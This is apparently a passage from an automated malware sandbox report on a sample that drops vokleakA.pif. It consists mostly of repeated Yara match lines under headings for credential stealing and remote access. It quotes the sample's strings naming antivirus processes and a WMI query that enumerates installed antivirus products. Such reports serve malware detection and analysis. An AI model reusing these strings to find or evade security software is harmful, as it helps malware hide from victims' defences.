              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: cmdagent.exe
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: quhlpsvc.exe
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgamsvr.exe
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: TMBMSRV.exe
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: Vsserv.exe
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgupsvc.exe
              Source: vokleakA.pif, 00000004.00000002.3235072816.0000000034540000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3229902141.000000002FF7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgemc.exe
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\Public\Libraries\vokleakA.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR
              Source: Yara matchFile source: 4.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2300614392.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2300614392.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000001.2149766444.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000001.2001615999.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2200611596.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000001.2001615999.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3207967153.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000001.2234454714.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3207967153.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2200611596.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2001613142.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000001.2234454714.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000001.2149766444.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2024259501.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
